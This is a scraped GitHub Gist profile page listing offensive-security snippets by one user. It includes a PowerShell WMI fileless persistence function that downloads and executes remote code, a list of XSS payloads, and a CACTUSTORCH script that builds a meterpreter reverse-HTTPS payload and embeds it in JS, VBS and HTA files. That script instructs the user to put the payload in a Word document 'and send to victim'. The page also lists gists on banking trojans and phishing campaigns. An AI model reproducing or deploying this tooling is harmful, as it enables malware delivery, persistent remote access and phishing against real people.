Skip to content

Instantly share code, notes, and snippets.


unload unexpectedBy

View GitHub Profile
View gist:ac1febb6e57ff84ebff2ba9c95485e2e
Credits to @mattifestion for his awesome work on WMI and Powershell Fileless Persistence. This script is an adaptation of his work.
function Install-Persistence{
$Payload = "((new-object net.webclient).downloadstring(''))"
$EventFilterName = 'Cleanup'
$EventConsumerName = 'DataCleanup'
$finalPayload = "powershell.exe -nop -c `"IEX $Payload`""

Windows Toolkit


Native Binaries

IDA Plugins Preferred Neutral Unreviewed
unexpectedBy / Numerics.cs
Created Mar 2, 2018
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
View Numerics.cs
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
Author: Casey Smith, Twitter: @subTee
unexpectedBy / XSS VECTORS
Created Jan 26, 2018
lista de vetores para xss
<body oninput=javascript:alert(1)><input autofocus>
<math href="javascript:javascript:alert(1)">CLICKME</math> <math> <maction actiontype="statusline#" xlink:href="javascript:javascript:alert(1)">CLICKME</maction> </math>
<frameset onload=javascript:alert(1)>
<table background="javascript:javascript:alert(1)">
<!--<img src="--><img src=x onerror=javascript:alert(1)//">
<comment><img src="</comment><img src=x onerror=javascript:alert(1))//">
<![><img src="]><img src=x onerror=javascript:alert(1)//">
<style><img src="</style><img src=x onerror=javascript:alert(1)//">
<li style=list-style:url() onerror=javascript:alert(1)> <div style=content:url(data:image/svg+xml,%%3Csvg/%%3E);visibility:hidden onload=javascript:alert(1)></div>
<head><base href="javascript://"></head><body><a href="/. /,javascript:alert(1)//#">XXX</a></body>
git clone && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\
unexpectedBy / gist:d41d2856a75e55d0d89f3be42227fb98
Created Oct 5, 2017
Github accounts with brazilian trojan banker
View gist:d41d2856a75e55d0d89f3be42227fb98
unexpectedBy / gist:cefc512c735b7a9770a2153c46178c49
Last active Aug 24, 2017
Campanha de phishings com encurtadores de url
View gist:cefc512c735b7a9770a2153c46178c49
unexpectedBy / facecheck2.0.php
Created Nov 16, 2015 — forked from googleinurl/facecheck2.0.php
Verificação de usuários Facebook 2.0
View facecheck2.0.php
E d i ç ã o - 2.0 / 29-09-2015
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
[+] Blog:
unexpectedBy /
Created Nov 16, 2015 — forked from googleinurl/
: '
[+] AUTOR: Cleiton Pinheiro / Nick: googleINURL
[+] EMAIL:
[+] Blog:
[+] Twitter:
You can’t perform that action at this time.